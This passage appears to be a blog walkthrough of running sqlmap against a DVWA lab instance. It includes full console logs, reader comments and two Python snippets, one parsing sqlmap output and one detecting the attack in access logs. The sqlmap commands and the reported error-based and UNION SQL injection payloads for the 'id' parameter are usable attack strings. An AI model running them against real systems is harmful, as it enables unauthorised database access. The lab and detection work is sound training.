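SAMPLE_LOG = """\
[04:16:17] [WARNING] POST parameter 'id' appears to be not dynamic
[04:16:17] [INFO] testing for SQL injection on POST parameter 'id'
[04:16:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:16:31] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:16:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:18:46] [WARNING] POST parameter 'id' is not injectable
sqlmap got a 302 redirect to 'http://172.16.0.12:80/login.php'. Do you want to follow? [Y/n]
[04:22:30] [INFO] Cookie parameter 'PHPSESSID' is dynamic
[04:22:30] [INFO] testing for SQL injection on Cookie parameter 'PHPSESSID'
[04:22:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:25:08] [WARNING] Cookie parameter 'PHPSESSID' is not injectable
[04:30:18] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests.
"""

if __name__ == "__main__":
    run = parse_sqlmap_log(SAMPLE_LOG)
    for p in run.params.values():
        print(f"{p.place} {p.name}: {p.verdict} after {len(p.techniques)} techniques, {p.finished - p.started}s")
    print(*explain(run), sep="\n")
```

Feed it a saved sqlmap console log (for example via `parse_sqlmap_log(open(path).read())`) to get the same per-parameter breakdown for a real run.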
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://172.16.0.12/vulnerabilities/sqli/?id=a&Submit=Submit" --dbms="mysql" --level=5

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:43:44

[04:43:44] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://172.16.0.12:80/login.php'. Do you want to follow? [Y/n]
[04:43:46] [INFO] testing if the url is stable, wait a few seconds
[04:43:47] [WARNING] GET parameter 'id' appears to be not dynamic
[04:43:47] [WARNING] reflective value(s) found and filtering out
[04:43:47] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[04:43:47] [INFO] testing for SQL injection on GET parameter 'id'
[04:43:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:43:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:43:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:43:54] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:43:56] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:43:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:43:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:43:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:43:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:43:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:43:56] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:43:56] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:43:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:43:57] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:43:57] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:43:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:43:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:44:00] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:44:01] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:44:02] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:44:02] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:44:02] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:44:02] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:44:02] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:44:02] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:44:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:44:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:44:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:44:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:44:12] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:44:20] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:44:27] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:44:34] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:44:41] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:44:47] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:44:54] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:45:01] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:45:08] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:45:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:45:23] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:45:31] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:45:38] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:45:45] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:45:52] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:45:58] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:46:05] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:46:12] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:46:19] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:46:26] [WARNING] GET parameter 'id' is not injectable
[04:46:26] [WARNING] GET parameter 'Submit' appears to be not dynamic
[04:46:26] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[04:46:26] [INFO] testing for SQL injection on GET parameter 'Submit'
[04:46:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:46:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:46:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:46:32] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:46:34] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:46:34] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:46:34] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:46:34] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:46:34] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:46:34] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:46:34] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:46:34] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:46:34] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:46:34] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:46:34] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:46:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:46:37] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:46:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:46:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:46:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:46:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:46:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:46:39] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:46:39] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:46:39] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:46:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:46:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:46:41] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:46:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:46:49] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:46:57] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:47:04] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:47:11] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:47:17] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:47:24] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:47:31] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:47:37] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:47:44] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:47:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:47:59] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:48:07] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:48:13] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:48:20] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:48:27] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:48:34] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:48:40] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:48:47] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:48:54] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:49:01] [WARNING] GET parameter 'Submit' is not injectable
[04:49:01] [WARNING] User-Agent parameter 'User-Agent' appears to be not dynamic
[04:49:01] [WARNING] heuristic test shows that User-Agent parameter 'User-Agent' might not be injectable
[04:49:01] [INFO] testing for SQL injection on User-Agent parameter 'User-Agent'
[04:49:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:49:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:49:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:49:07] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:49:09] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:49:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:49:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:49:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:49:09] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:49:09] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:49:09] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:49:09] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:49:09] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:49:09] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:49:09] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:49:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:49:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:49:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:49:13] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:49:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:49:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:49:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:49:14] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:49:14] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:49:14] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:49:14] [INFO] testing 'MySQL > 5.0.11 stacked queries' [04:49:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [04:49:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)' [04:49:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [04:49:24] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns' [04:49:32] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns' [04:49:39] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns' [04:49:46] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns' [04:49:53] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns' [04:49:59] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns' [04:50:05] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns' [04:50:12] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns' [04:50:18] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns' [04:50:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [04:50:32] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns' [04:50:40] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns' [04:50:47] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns' [04:50:53] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns' [04:51:00] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns' [04:51:07] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns' [04:51:13] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns' [04:51:20] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns' [04:51:26] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns' [04:51:33] [WARNING] User-Agent parameter 'User-Agent' is not injectable [04:51:33] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. 
Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details [*] shutting down at 04:51:33
Manual injection
The strange thing is that it said “id” is not injectable… but I could actually do the injection manually…
Update
Thanks Darren Martyn! 🙂
Either use Burp Suite or Tamper Data to intercept the HTTP traffic and grab the session cookie. In my case I use Tamper Data: take the cookie from the GET request, pass it to sqlmap with --cookie, and you will find that the variable “id” is injectable.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://172.16.0.12/vulnerabilities/sqli/?id=a&Submit=Submit" --cookie="PHPSESSID=hb25vpdh4q46lpl54f8b4fs755; security=low" --dbms="mysql"

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:14:04

[15:14:05] [INFO] testing connection to the target url
[15:14:05] [INFO] testing if the url is stable, wait a few seconds
[15:14:06] [INFO] url is stable
[15:14:06] [INFO] testing if GET parameter 'id' is dynamic
[15:14:06] [WARNING] GET parameter 'id' appears to be not dynamic
[15:14:06] [INFO] heuristics detected web page charset 'ascii'
[15:14:06] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[15:14:06] [INFO] testing for SQL injection on GET parameter 'id'
[15:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:14:06] [WARNING] reflective value(s) found and filtering out
[15:14:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:14:06] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[15:14:06] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:14:06] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:14:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:14:06] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[15:14:06] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[15:14:06] [INFO] target url appears to have 2 columns in query
[15:14:06] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
[15:19:05] [INFO] testing if GET parameter 'Submit' is dynamic
[15:19:05] [WARNING] GET parameter 'Submit' appears to be not dynamic
[15:19:05] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[15:19:05] [INFO] testing for SQL injection on GET parameter 'Submit'
[15:19:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:19:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:19:05] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:19:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:19:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[15:19:37] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 136 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=a' AND (SELECT 3525 FROM(SELECT COUNT(*),CONCAT(0x3a7063723a,(SELECT (CASE WHEN (3525=3525) THEN 1 ELSE 0 END)),0x3a7972703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ovgr'='ovgr&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=a' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a7063723a,0x754b415379446f786474,0x3a7972703a), NULL#&Submit=Submit
---
[15:19:37] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
[15:19:37] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/172.16.0.12'

[*] shutting down at 15:19:37
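From the defender's side, the two payloads in the report above are what ends up in the web server's access log. The following Python is an added example, not code from the original post: it scans constructed Apache access-log lines for the shapes of those two payloads (the FLOOR(RAND(0)*2) GROUP BY trick, UNION ALL SELECT, CONCAT of hex markers, and the AND 'x'='x tautology) and reports which parameter tripped which signature. Client IPs, timestamps and the log lines themselves are constructed; the signatures are illustrative, not a complete SQLi ruleset.

```python
# Added example, not from the original post: flag sqlmap-style probes like the
# two payloads reported against DVWA's 'id' parameter in Apache access-log lines.
import re
from urllib.parse import parse_qs, quote, urlsplit

# Signature shapes taken from the two reported payloads: FLOOR(RAND(0)*2) ... GROUP BY
# (error-based), UNION ALL SELECT, CONCAT(0x..) markers, AND 'x'='x. Illustrative only.
SIGNATURES = {
    "error_based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "hex_concat": re.compile(r"CONCAT\s*\(\s*0x[0-9a-f]+", re.I),
    "tautology": re.compile(r"\bAND\s+'(\w+)'\s*=\s*'\1", re.I),
}
# Apache combined format: ip ident user [time] "METHOD url PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) '
                    r'(?P<url>\S+) \S+" (?P<status>\d{3})')

def analyse_url(url):
    """Map each query parameter whose percent-decoded value trips a signature to the names."""
    hits = {}
    for param, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        names = [n for n, rx in SIGNATURES.items() if any(rx.search(v) for v in values)]
        if names:
            hits[param] = names
    return hits

def scan_access_log(lines):
    """Return (ip, url, hits) for every request line that trips a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        hits = analyse_url(m.group("url")) if m else {}
        if hits:
            findings.append((m.group("ip"), m.group("url"), hits))
    return findings

# Constructed sample traffic: the two payloads copied from the sqlmap report
# above plus a benign request, percent-encoded as they would appear in a log.
ERROR_BASED = ("a' AND (SELECT 3525 FROM(SELECT COUNT(*),CONCAT(0x3a7063723a,(SELECT (CASE WHEN "
               "(3525=3525) THEN 1 ELSE 0 END)),0x3a7972703a,FLOOR(RAND(0)*2))x FROM "
               "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ovgr'='ovgr")
UNION_BASED = "a' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a7063723a,0x754b415379446f786474,0x3a7972703a), NULL#"

def log_line(ip, id_value, status=200):
    url = "/vulnerabilities/sqli/?id=%s&Submit=Submit" % quote(id_value, safe="")
    return '%s - - [27/Oct/2012:15:14:06 +0800] "GET %s HTTP/1.1" %d 4321' % (ip, url, status)

SAMPLE_LOG = [log_line("172.16.0.5", "O'Brien"),  # a lone quote on its own must not alert
              log_line("172.16.0.20", ERROR_BASED), log_line("172.16.0.20", UNION_BASED)]
```

Running scan_access_log(SAMPLE_LOG) flags only the two constructed requests from 172.16.0.20; a burst of such hits from one client in a short window (sqlmap needed 136 requests here) is the pattern worth alerting on.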
Nice job cyrus!
Thanks for the encouragement! 😀
You need to specify a cookie with DVWA. Normally done by using BURP to get the cookie and passing it to SQLmap with --cookie=COOKIE 🙂
Thanks for the tip! I have updated the post! 😀